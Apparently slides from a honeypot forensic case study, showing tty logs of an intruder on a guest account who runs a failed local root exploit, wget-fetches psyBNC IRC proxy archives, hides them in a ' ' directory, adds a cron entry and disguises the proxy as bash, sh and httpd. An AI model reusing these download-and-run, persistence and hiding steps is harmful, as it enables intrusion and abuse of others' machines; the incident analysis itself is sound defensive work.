HoneyNet case analysis: Break-ins and set up IRC proxy

presentation slide

Data sample

Use tcptrace to find out the large volume of traffic

=======> 6257825 Feb 26 04:01 /var/log/pcap/1235588461/log ============================================================================== 672: [Honey Pot IP]:3670 - 38.100.19.122:80 (ayq2ayr) 373> 371< (complete) 624: 172.158.157.116:1289 - [Honey Pot IP]:22 (auy2auz) 369> 292< (complete) 729: [Honey Pot IP]:4565 - 194.109.20.90:6667 (bda2bdb) 262> 222< 507: 172.158.157.116:1288 - [Honey Pot IP]:22 (aly2alz) 257> 217< (complete) 710: 172.158.157.116:1290 - [Honey Pot IP]:31337 (bbo2bbp) 137> 141< (complete) =======> 1388600 Apr 14 19:00 /var/log/pcap/1239703261/log ============================================================================== 2: [Honey Pot IP]:6969 - 89.32.158.213:1043 (c2d) 2265> 1868< 1: 208.83.20.130:6667 - [Honey Pot IP]:1603 (a2b) 2170> 2245< 3: 194.109.20.90:6669 - [Honey Pot IP]:1537 (g2h) 198> 237<

The ttylog shows the intruder tried to break-in root but failed

 
START at: Sun Feb 22 23:20:44 2009



bash-3.1$  passwd
Changing password for user guest.
Changing password for guest
(current) UNIX password: 
New UNIX password: 
Retype new UNIX password: 
passwd: all authentication tokens updated successfully.
bash-3.1$ uname -a
Linux pc18 2.6.18-53.1.14.el5 #1 SMP Wed Mar 5 11:36:49 EST 2008 i686 i686 i386 GNU/Linux
bash-3.1$ cd /var/tmp
bash-3.1$ wget geocities.com/vizitainiad/a.tgz
--23:22:03--  http://geocities.com/vizitainiad/a.tgz
Resolving geocities.com... 66.218.77.68
Connecting to geocities.com|66.218.77.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5597 (5.5K) [application/x-compressed]
Saving to: `a.tgz'


 0% [                                        ] 0           --.-K/s             
100%[=======================================>] 5,597       32.7K/s   in 0.2s   

23:22:06 (32.7 KB/s) - `a.tgz' saved [5597/5597]

bash-3.1$ tar xzvf a.tgz
a
a.c
bash-3.1$ rm -rf a.tgz a.c
bash-3.1$ ./a
-----------------------------------
 Linux Local Root Exploit
 Haxoreala By Mickey
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f07000 .. 0xb7f39000
[-] vmsplice: Bad address
bash-3.1$ ./a
-----------------------------------
 Linux Local Root Exploit
 Haxoreala By Mickey
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f93000 .. 0xb7fc5000
[-] vmsplice: Bad address
bash-3.1$ ./a
-----------------------------------
 Linux Local Root Exploit
 Haxoreala By Mickey
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f20000 .. 0xb7f52000
[-] vmsplice: Bad address
bash-3.1$ rm -rf a
bash-3.1$ hostname
pc18
bash-3.1$ cat /proc/cpuinfo
processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 15
model name	: Intel(R) Xeon(R) CPU            5120  @ 1.86GHz
stepping	: 8
cpu MHz		: 1866.102
cache size	: 4096 KB
fdiv_bug	: no
hlt_bug		: no
f00f_bug	: no
coma_bug	: no
fpu		: yes
fpu_exception	: yes
cpuid level	: 10
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss nx lm constant_tsc up pni ds_cpl cx16 lahf_lm
bogomips	: 3746.07
bash-3.1$ ps ax PID TTY STAT TIME COMMAND 1 ? Ss 0:02 init [3] 2 ? S 0:00 [migration/0] 3 ? SN 0:00 [ksoftirqd/0] 4 ? S 0:00 [watchdog/0] 5 ? S< 0:00 [events/0] 6 ? S< 0:00 [khelper] 7 ? S< 0:00 [kthread] 10 ? S< 0:00 [kblockd/0] 11 ? S< 0:00 [kacpid] 67 ? S< 0:00 [cqueue/0] 70 ? S< 0:00 [khubd] 72 ? S< 0:00 [kseriod] 135 ? S 0:00 [pdflush] 136 ? S 0:00 [pdflush] 137 ? S< 0:04 [kswapd0] 138 ? S< 0:00 [aio/0] 292 ? S< 0:00 [kpsmoused] 323 ? S< 0:00 [scsi_eh_0] 324 ? S< 0:02 [kjournald] 352 ? S< 0:00 [kauditd] 386 ? S<s 0:00 /sbin/udevd -d 662 ? S< 0:00 [ata/0] 663 ? S< 0:00 [ata_aux] 1065 ? S< 0:00 [kmpathd/0] 1541 ? S<sl 0:00 auditd 1543 ? S<s 0:00 python /sbin/audispd 1562 ? Ss 0:00 syslogd -m 0 1565 ? Ss 0:00 klogd -x 1621 ? Ssl 0:00 /usr/sbin/named -u named 1681 ? Ss 0:00 portmap 1707 ? Ss 0:00 rpc.statd 1754 ? Ss 0:00 rpc.idmapd 1844 ? Ss 0:03 /usr/sbin/vmware-guestd --background /var/run/vmware- 1867 ? Ss 0:00 dbus-daemon --system 1915 ? Ssl 0:00 pcscd 1940 ? Ss 0:00 /usr/sbin/acpid 1959 ? Ss 0:00 /usr/sbin/sshd 1976 ? Ss 0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid 1995 ? SLs 0:00 ntpd -u ntp:ntp -p /var/run/ntpd.pid -g 2011 ? Ss 0:00 /usr/sbin/dovecot 2012 ? S 0:00 dovecot-auth 2037 ? Ss 0:00 sendmail: accepting connections 2045 ? Ss 0:00 sendmail: Queue runner@01:00:00 for /var/spool/client 2062 ? Ss 0:00 gpm -m /dev/input/mice -t exps2 2079 ? S 0:00 /usr/sbin/nss_pcache off /etc/httpd/alias 2081 ? Ssl 0:01 /usr/sbin/httpd 2098 ? Ss 0:00 crond 2101 ? S 0:00 pop3-login 2102 ? S 0:00 pop3-login 2103 ? S 0:00 pop3-login 2104 ? S 0:00 imap-login 2105 ? S 0:00 imap-login 2107 ? S 0:00 imap-login 2131 ? Ss 0:00 squid -D 2133 ? S 0:01 (squid) -D 2135 ? Ss 0:00 (unlinkd) 2171 ? Ss 0:00 xfs -droppriv -daemon 2202 ? Ss 0:00 /usr/sbin/atd 2218 ? Ss 0:00 hald 2219 ? S 0:00 hald-runner 2226 ? S 0:00 hald-addon-acpi: listening on acpid socket /var/run/a 2233 ? S 0:00 hald-addon-keyboard: listening on /dev/input/event0 2242 ? S 0:01 hald-addon-storage: polling /dev/hdc 2266 ? S 0:00 /usr/bin/perl -w /bin/ntpmon 2269 tty1 Ss+ 0:00 /sbin/mingetty tty1 2270 tty2 Ss+ 0:00 /sbin/mingetty tty2 2281 tty3 Ss+ 0:00 /sbin/mingetty tty3 2282 tty4 Ss+ 0:00 /sbin/mingetty tty4 2290 tty5 Ss+ 0:00 /sbin/mingetty tty5 2291 tty6 Ss+ 0:00 /sbin/mingetty tty6 3973 ? S 0:00 /usr/sbin/httpd 3974 ? S 0:00 /usr/sbin/httpd 3975 ? S 0:00 /usr/sbin/httpd 3976 ? S 0:00 /usr/sbin/httpd 3977 ? S 0:00 /usr/sbin/httpd 3978 ? S 0:00 /usr/sbin/httpd 3979 ? S 0:00 /usr/sbin/httpd 3980 ? S 0:00 /usr/sbin/httpd 28386 ? Ss 0:00 sshd: guest [priv] 28388 ? S 0:00 sshd: guest@pts/0 28389 pts/0 Ss+ 0:00 -bash 28390 pts/1 Ss+ 0:00 /bin/bash 28391 ? S 0:00 /bin/sh /bin/numr0 1 x001 28392 ? R 2:45 /bin/numr1 1 28393 ? S 0:00 /bin/numr2 1 1 2 8081 28463 ? Ss 0:00 sshd: guest [priv] 28475 ? S 0:00 sshd: guest@pts/2 28478 pts/2 Ss+ 0:00 -bash 28481 pts/3 Ss 0:00 /bin/bash 28484 ? S 0:00 /bin/sh /bin/numr0 3 x003 28485 ? R 1:06 /bin/numr1 3 28486 ? S 0:00 /bin/numr2 1 1 2 8083 28611 ? Ss 0:00 sshd: unknown [priv] 28612 ? S 0:00 sshd: unknown [net] 28613 pts/3 R+ 0:00 ps ax 
bash-3.1$ w
 23:23:07 up 2 days, 14:05,  2 users,  load average: 1.96, 1.05, 0.42
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
guest    pts/0    210.207.152.69   23:18    4:11   0.00s  0.06s sshd: guest [pr
guest    pts/2    62.118.0.131     23:20    0.00s  0.01s  0.02s sshd: guest [pr
bash-3.1$ kill -9 28389
bash-3.1$ w
 23:23:24 up 2 days, 14:06,  1 user,  load average: 1.97, 1.09, 0.44
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
guest    pts/2    62.118.0.131     23:20    0.00s  0.01s  0.02s sshd: guest [pr
bash-3.1$ kill -9 0

STOP  at: Sun Feb 22 23:23:31 2009

Intruder install a psybnc after broke into the guest account

 START at: Thu Feb 26 03:28:59 2009 bash-3.1$ bash-3.1$ a bash: a: command not found bash-3.1$ cat /etc/hosts # Do not remove the following line, or various programs # that require network functionality will fail. [delete].99.129 [delete]1 [delete]1.[HoneyPot Domain] [Honey Pot IP] pc18 pc18.[HoneyPot Domain] 127.0.0.1 localhost localhost.localdomain ::1 localhost6.localdomain6 localhost6 bash-3.1$ uname -a Linux pc18 2.6.18-53.1.14.el5 #1 SMP Wed Mar 5 11:36:49 EST 2008 i686 i686 i386 GNU/Linux bash-3.1$ passwd Changing password for user guest. Changing password for guest (current) UNIX password: New UNIX password: Retype new UNIX password: Sorry, passwords do not match. New UNIX password: BAD PASSWORD: is too similar to the old one New UNIX password: Retype new UNIX password: passwd: all authentication tokens updated successfully. bash-3.1$ cd /tmp bash-3.1$ ls bash-3.1$ wget wget: missing URL Usage: wget [OPTION]... [URL]... Try `wget --help' for more options. bash-3.1$ ls bash-3.1$ cd /tmp 
bash-3.1$  mkdir " "
bash-3.1$ cd " " bash-3.1$ wget gabanu.webng.com/redone.tar.gz --03:32:32-- http://gabanu.webng.com/redone.tar.gz Resolving gabanu.webng.com... 38.100.19.122, 38.100.19.123 Connecting to gabanu.webng.com|38.100.19.122|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 471040 (460K) [application/x-gzip] Saving to: `redone.tar.gz' 0% [ ] 0 --.-K/s 1% [ ] 6,132 24.8K/s 1% [ ] 9,028 18.6K/s 3% [> ] 15,524 21.3K/s 5% [=> ] 25,764 26.5K/s 7% [==> ] 36,004 29.6K/s 9% [==> ] 46,244 31.4K/s 11% [===> ] 56,484 32.9K/s 14% [====> ] 68,172 34.8K/s 16% [=====> ] 76,964 34.9K/s 18% [======> ] 87,204 35.6K/s 20% [=======> ] 97,444 36.2K/s 22% [=======> ] 105,636 36.0K/s 24% [========> ] 115,876 36.4K/s eta 10s 26% [=========> ] 126,116 36.9K/s eta 10s 28% [==========> ] 136,356 37.2K/s eta 10s 31% [===========> ] 146,596 37.5K/s eta 10s 33% [============> ] 158,284 38.1K/s eta 10s 35% [=============> ] 167,076 38.0K/s eta 8s 37% [==============> ] 177,316 38.2K/s eta 8s 39% [==============> ] 187,556 38.4K/s eta 8s 42% [===============> ] 199,244 39.6K/s eta 8s 44% [================> ] 208,036 40.7K/s eta 8s 45% [=================> ] 216,228 41.1K/s eta 6s 48% [==================> ] 226,468 41.1K/s eta 6s 50% [===================> ] 236,708 41.1K/s eta 6s 52% [===================> ] 246,948 41.2K/s eta 6s 54% [====================> ] 257,188 41.2K/s eta 6s 56% [=====================> ] 267,428 40.9K/s eta 5s 58% [======================> ] 277,668 41.2K/s eta 5s 61% [=======================> ] 289,356 41.5K/s eta 5s 63% [========================> ] 298,148 41.2K/s eta 5s 65% [=========================> ] 309,836 41.9K/s eta 5s 67% [==========================> ] 318,628 41.6K/s eta 4s 69% [==========================> ] 328,868 41.6K/s eta 4s 71% [===========================> ] 339,108 41.6K/s eta 4s 74% [============================> ] 349,348 41.6K/s eta 4s 76% [=============================> ] 359,588 41.3K/s eta 4s 78% [==============================> ] 367,780 41.2K/s eta 3s 80% [===============================> ] 378,020 41.2K/s eta 3s 82% [===============================> ] 388,260 41.2K/s eta 3s 84% [================================> ] 399,948 41.2K/s eta 3s 86% [=================================> ] 408,740 41.2K/s eta 3s 88% [==================================> ] 418,980 41.6K/s eta 1s 91% [===================================> ] 429,220 41.6K/s eta 1s 93% [====================================> ] 439,460 41.6K/s eta 1s 95% [=====================================> ] 449,700 41.6K/s eta 1s 97% [======================================> ] 459,940 41.6K/s eta 1s 100%[=======================================>] 471,040 41.8K/s eta 0s 100%[=======================================>] 471,040 41.8K/s in 11s 03:32:51 (40.2 KB/s) - `redone.tar.gz' saved [471040/471040] bash-3.1$ tar xvf redone.tar.gz redone/ redone/scripts/ redone/scripts/INFO redone/scripts/DEFAULT.SCRIPT redone/scripts/example/ redone/scripts/example/DEFAULT.SCRIPT redone/lang/ redone/lang/INFO redone/lang/english.lng redone/motd/ redone/motd/INFO redone/kik redone/proc redone/psybnc.conf redone/httpd redone/hide redone/run redone/config redone/log/ redone/log/INFO redone/help/ redone/help/DCCCHAT.TXT .... .... .... redone/help/ENCRYPT.TXT redone/help/LINKFROM.TXT redone/help/BREHASH.TXT redone/help/SETUSERNAME.TXT redone/fuck redone/config.h bash-3.1$ cd redone bash-3.1$ ls config fuck hide kik log proc run config.h help httpd lang motd psybnc.conf scripts bash-3.1$ ./config private 31337 PSYBNC Configure By ReD_oNe PSYBNC.SYSTEM.PORT1=31337 PSYBNC.SYSTEM.HOST1=* PSYBNC.HOSTALLOWS.ENTRY0=*;* USER0.USER.LOGIN=private USER0.USER.PASS=* USER0.USER.RIGHTS=1 bash-3.1$ ./fuck * * * * * /tmp/ /redone/y2kupdate >/dev/null 2>&1 bash-3.1$ ./run .-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-. ,----.,----.,-. ,-.,---.,--. ,-.,----. | O || ,-' \ \/ / | o || \| || ,--' | _/ _\ \ \ / | o< | |\ || |__ |_| |____/ |__| |___||_| \_| \___| Version 2.3.1 (c) 1999-2002 the most psychoid and the cool lam3rz Group IRCnet `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-' Configuration File: redone Language File: psyBNC Language File - English No logfile specified, logging to log/psybnc.log Listening on: 0.0.0.0 port 31337 psyBNC2.3.1-cBtITLdDMSNp started (PID 7847) bash-3.1$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin radiusd:x:95:95:radiusd user:/:/bin/false squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/bash ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin cto:x:30004:30004:Chief Technical Officer:/home/cto:/sbin/bash guest:x:30005:30005:Demo guest account:/home/guest:/sbin/bash demo:x:30006:30006:Demo for IEE:/home/demo:/sbin/bash bash-3.1$ STOP at: Thu Feb 26 03:35:55 2009

The intruder disguised the running of psybnc as a shell program

START at: Sat Mar 21 19:44:33 2009 ls bash: cd: /tmpls: No such file or directory bash-3.1$ cd /tmp/" " bash-3.1$ ls bash-3.1$ wget http://helpbnc.ucoz.net/stuff/PsyLinux.tgz --19:44:56-- http://helpbnc.ucoz.net/stuff/PsyLinux.tgz Resolving helpbnc.ucoz.net... 208.100.61.2 Connecting to helpbnc.ucoz.net|208.100.61.2|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 573709 (560K) [application/octet-stream] Saving to: `PsyLinux.tgz' 0% [ ] 0 --.-K/s 0% [ ] 0 --.-K/s 0% [ ] 4,344 3.37K/s 1% [ ] 10,136 6.61K/s 4% [> ] 26,064 14.7K/s 7% [==> ] 44,888 22.2K/s 15% [=====> ] 88,328 39.0K/s 26% [=========> ] 150,592 59.8K/s 43% [================> ] 248,896 90.0K/s 60% [=======================> ] 347,200 115K/s 77% [==============================> ] 445,504 137K/s eta 1s 94% [====================================> ] 543,808 155K/s eta 1s 100%[=======================================>] 573,709 163K/s in 3.4s 19:45:01 (163 KB/s) - `PsyLinux.tgz' saved [573709/573709] bash-3.1$ tar zxvf PsyLinux.tgz psybnc/ psybnc/makefile.out psybnc/tools/ psybnc/tools/chkenv psybnc/tools/sys .... ..... ...... psybnc/src/p_idea.c psybnc/src/bsd-setenv.c psybnc/src/ssl.cnf psybnc/src/p_crypt.c psybnc/CHANGES psybnc/psybnc psybnc/motd/ psybnc/motd/INFO psybnc/FAQ psybnc/Makefile bash-3.1$ cd psybnc bash-3.1$ ls CHANGES README help makesalt psybnc.conf src COPYING SCRIPTING lang menuconf psybncchk targets.mak FAQ TODO log motd salt.h tools Makefile config.h makefile.out psybnc scripts 
bash-3.1$  mv psybnc bash
bash-3.1$ chmod +x * bash-3.1$ cat psybnc.conf PSYBNC.SYSTEM.PORT1=31337 PSYBNC.SYSTEM.HOST1=* PSYBNC.HOSTALLOWS.ENTRY0=*;* bash-3.1$ PATH+'.' bash: PATH+.: command not found bash-3.1$ PAth='.' bash-3.1$ bash [guest@pc18 psybnc]$ PATH='.' 
[guest@pc18 psybnc]$ bash
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-. ,----.,----.,-. ,-.,---.,--. ,-.,----. | O || ,-' \ \/ / | o || \| || ,--' | _/ _\ \ \ / | o< | |\ || |__ |_| |____/ |__| |___||_| \_| \___| Version 2.3.2-4 (c) 1999-2003 the most psychoid and the cool lam3rz Group IRCnet `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-' Configuration File: psybnc.conf Language File: psyBNC Language File - English No logfile specified, logging to log/psybnc.log Listening on: 0.0.0.0 port 31337 psyBNC2.3.2-4-cBtITLdDMSNp started (PID 29855) ]0;guest@pc18:/tmp/ /psybnc[guest@pc18 psybnc]$ STOP at: Sat Mar 21 19:47:24 2009 START at: Wed Mar 25 20:50:55 2009 ls bash: /tmls: No such file or directory bash-3.1$ cd /tmp bash-3.1$ ls 
bash-3.1$  cd " "
bash-3.1$ ls PsyLinux.tgz psybnc bash-3.1$ ps -x Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ PID TTY STAT TIME COMMAND 15611 ? S 0:00 bash 15625 ? S 0:00 sshd: guest@pts/0 15627 pts/1 Ss 0:00 /bin/bash 15638 pts/1 R+ 0:00 ps -x bash-3.1$ kill -9 15611 bash-3.1$ ls PsyLinux.tgz psybnc bash-3.1$ cd psybnc/ bash-3.1$ ls CHANGES SCRIPTING lang motd salt.h COPYING TODO log psybnc.conf scripts FAQ bash makefile.out psybnc.conf.old src Makefile config.h makesalt psybnc.pid targets.mak README help menuconf psybncchk tools 
bash-3.1$ mv bash sh
bash-3.1$ PATH='.' bash-3.1$ sh .-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-. ,----.,----.,-. ,-.,---.,--. ,-.,----. | O || ,-' \ \/ / | o || \| || ,--' | _/ _\ \ \ / | o< | |\ || |__ |_| |____/ |__| |___||_| \_| \___| Version 2.3.2-4 (c) 1999-2003 the most psychoid and the cool lam3rz Group IRCnet `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-' Configuration File: psybnc.conf Language File: psyBNC Language File - English No logfile specified, logging to log/psybnc.log Listening on: 0.0.0.0 port 31337 psyBNC2.3.2-4-cBtITLdDMSNp started (PID 15643) bash-3.1$ STOP at: Wed Mar 25 20:54:15 2009

Exam the honeypot processes

 Script started on Thu 16 Apr 2009 08:57:27 AM HKT fortress:/root> ssh pc18/ Last login: Wed Apr 15 09:44:37 2009 from [delete]-fw.[HoneyPot Domain] ]0;root@pc18:~[root@pc18 ~]# tcsh [root@pc18 ~]# cd pc18:/root> cd /tmp pc18:/tmp> ls / ./ ../ .font-unix/ .ICE-unix/ 
pc18:/tmp> cd " "
pc18:/tmp/ > ls ./ ../ pc18:/tmp/ > ls -lR .: total 12 drwxr-xr-x 2 guest guest 4096 Apr 16 04:34 ./ drwxrwxrwt 5 root root 4096 Apr 12 04:25 ../ pc18:/tmp/ > ls -lR .: total 12 drwxr-xr-x 2 guest guest 4096 Apr 16 04:34 ./ drwxrwxrwt 5 root root 4096 Apr 12 04:25 ../ pc18:/tmp/ > ps -ef UID PID PPID C STIME TTY TIME CMD root 1 0 0 Mar01 ? 00:00:01 init [3] root 2 1 0 Mar01 ? 00:00:00 [migration/0] root 3 1 0 Mar01 ? 00:00:03 [ksoftirqd/0] root 4 1 0 Mar01 ? 00:00:00 [watchdog/0] root 5 1 0 Mar01 ? 00:00:01 [events/0] root 6 1 0 Mar01 ? 00:00:00 [khelper] root 7 1 0 Mar01 ? 00:00:00 [kthread] root 10 7 0 Mar01 ? 00:00:07 [kblockd/0] root 11 7 0 Mar01 ? 00:00:00 [kacpid] root 67 7 0 Mar01 ? 00:00:00 [cqueue/0] root 70 7 0 Mar01 ? 00:00:00 [khubd] root 72 7 0 Mar01 ? 00:00:00 [kseriod] root 135 7 0 Mar01 ? 00:00:02 [pdflush] root 136 7 0 Mar01 ? 00:00:02 [pdflush] root 137 7 0 Mar01 ? 00:01:10 [kswapd0] root 138 7 0 Mar01 ? 00:00:00 [aio/0] root 291 7 0 Mar01 ? 00:00:00 [kpsmoused] root 320 7 0 Mar01 ? 00:00:00 [scsi_eh_0] root 321 7 0 Mar01 ? 00:00:50 [kjournald] root 349 7 0 Mar01 ? 00:00:00 [kauditd] root 383 1 0 Mar01 ? 00:00:00 /sbin/udevd -d root 681 7 0 Mar01 ? 00:00:00 [ata/0] root 682 7 0 Mar01 ? 00:00:00 [ata_aux] root 1060 7 0 Mar01 ? 00:00:00 [kmpathd/0] root 1536 1 0 Mar01 ? 00:00:11 auditd root 1538 1536 0 Mar01 ? 00:00:12 python /sbin/audispd root 1557 1 0 Mar01 ? 00:00:15 syslogd -m 0 root 1560 1 0 Mar01 ? 00:00:00 klogd -x rpc 1677 1 0 Mar01 ? 00:00:00 portmap rpcuser 1703 1 0 Mar01 ? 00:00:00 rpc.statd root 1749 1 0 Mar01 ? 00:00:00 rpc.idmapd root 1839 1 0 Mar01 ? 00:01:22 /usr/sbin/vmware-guestd --background /var/run/vmware-guestd.pid dbus 1862 1 0 Mar01 ? 00:00:00 dbus-daemon --system root 1910 1 0 Mar01 ? 00:00:00 pcscd root 1935 1 0 Mar01 ? 00:00:00 /usr/sbin/acpid root 1954 1 0 Mar01 ? 00:00:05 /usr/sbin/sshd root 1971 1 0 Mar01 ? 00:00:00 xinetd -stayalive -pidfile /var/run/xinetd.pid ntp 1990 1 0 Mar01 ? 00:00:00 ntpd -u ntp:ntp -p /var/run/ntpd.pid -g root 2032 1 0 Mar01 ? 00:00:00 sendmail: accepting connections smmsp 2040 1 0 Mar01 ? 00:00:00 sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue root 2057 1 0 Mar01 ? 00:00:00 gpm -m /dev/input/mice -t exps2 root 2099 1 0 Mar01 ? 00:00:10 crond root 2126 1 0 Mar01 ? 00:00:00 squid -D squid 2128 2126 0 Mar01 ? 00:00:24 (squid) -D squid 2130 2128 0 Mar01 ? 00:00:00 (unlinkd) xfs 2166 1 0 Mar01 ? 00:00:00 xfs -droppriv -daemon apache 2187 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd apache 2188 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd apache 2189 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd apache 2190 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd apache 2191 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd apache 2192 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd apache 2193 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd apache 2194 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd root 2197 1 0 Mar01 ? 00:00:00 /usr/sbin/atd apache 2202 6576 0 Apr13 ? 00:00:00 /usr/sbin/httpd 68 2213 1 0 Mar01 ? 00:00:00 hald root 2214 2213 0 Mar01 ? 00:00:00 hald-runner 68 2221 2214 0 Mar01 ? 00:00:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket 68 2228 2214 0 Mar01 ? 00:00:00 hald-addon-keyboard: listening on /dev/input/event0 root 2237 2214 0 Mar01 ? 00:00:32 hald-addon-storage: polling /dev/hdc root 2261 1 0 Mar01 ? 00:00:00 /usr/bin/perl -w /bin/ntpmon root 2264 1 0 Mar01 tty1 00:00:00 /sbin/mingetty tty1 root 2265 1 0 Mar01 tty2 00:00:00 /sbin/mingetty tty2 root 2276 1 0 Mar01 tty3 00:00:00 /sbin/mingetty tty3 root 2279 1 0 Mar01 tty4 00:00:00 /sbin/mingetty tty4 root 2282 1 0 Mar01 tty5 00:00:00 /sbin/mingetty tty5 root 2283 1 0 Mar01 tty6 00:00:00 /sbin/mingetty tty6 root 6574 1 0 Mar24 ? 00:00:00 /usr/sbin/nss_pcache off /etc/httpd/alias root 6576 1 0 Mar24 ? 00:00:02 /usr/sbin/httpd guest 6599 1 0 Apr08 ? 00:01:38 /usr/local/apache/bin/httpd -DSSL named 10374 1 0 Apr08 ? 00:00:23 /usr/sbin/named -u named guest 14522 1 0 04:44 ? 00:00:00 bash root 15451 1954 0 08:57 ? 00:00:00 sshd: root@pts/0 root 15453 15451 0 08:57 pts/0 00:00:00 -bash root 15481 15453 0 08:57 pts/0 00:00:00 -csh root 15521 15481 0 08:58 pts/0 00:00:00 ps -ef apache 27549 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd pc18:/tmp/ > ps -ef|grep guest 
 root      1839     1  0 Mar01 ?        00:01:22 /usr/sbin/vmware-guestd --background /var/run/vmware-guestd.pid
guest     6599     1  0 Apr08 ?        00:01:38 /usr/local/apache/bin/httpd -DSSL                                                                                                                                                                                                                        ? redone
guest    14522     1  0 04:44 ?        00:00:00 bash
pc18:/tmp/ > lsof -p 6599 COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME 
httpd   6599 guest  cwd    DIR     8,1       0 1317314 /tmp/ /redone (deleted)
httpd 6599 guest rtd DIR 8,1 4096 2 / httpd 6599 guest txt REG 8,1 202544 1317318 /tmp/ /redone/httpd (deleted) httpd 6599 guest mem REG 8,1 76400 426061 /lib/libresolv-2.5.so httpd 6599 guest mem REG 8,1 125736 425986 /lib/ld-2.5.so httpd 6599 guest mem REG 8,1 1589908 426002 /lib/libc-2.5.so httpd 6599 guest mem REG 8,1 208352 426025 /lib/libm-2.5.so httpd 6599 guest mem REG 8,1 46680 426024 /lib/libnss_files-2.5.so httpd 6599 guest mem REG 8,1 21788 426022 /lib/libnss_dns-2.5.so httpd 6599 guest 0u CHR 136,4 6 /dev/pts/4 (deleted) httpd 6599 guest 1u CHR 136,4 6 /dev/pts/4 (deleted) httpd 6599 guest 2u CHR 136,4 6 /dev/pts/4 (deleted) httpd 6599 guest 3u IPv4 2774371 TCP *:acmsoda (LISTEN) httpd 6599 guest 4w REG 8,1 21577 1409728 /tmp/ /redone/log/psybnc.log.old (deleted) httpd 6599 guest 5w REG 8,1 5 1317329 /tmp/ /redone/psybnc.pid (deleted) httpd 6599 guest 6u IPv4 3238239 TCP pc18:4144->Tampa.FL.US.Undernet.org:ircd (CLOSE_WAIT) httpd 6599 guest 7w REG 8,1 0 1409729 /tmp/ /redone/log/USER1.TRL (deleted) httpd 6599 guest 8u IPv4 3277295 TCP pc18:4759->undernet.xs4all.nl:6669 (CLOSE_WAIT) httpd 6599 guest 9w REG 8,1 0 1409732 /tmp/ /redone/log/USER2.TRL 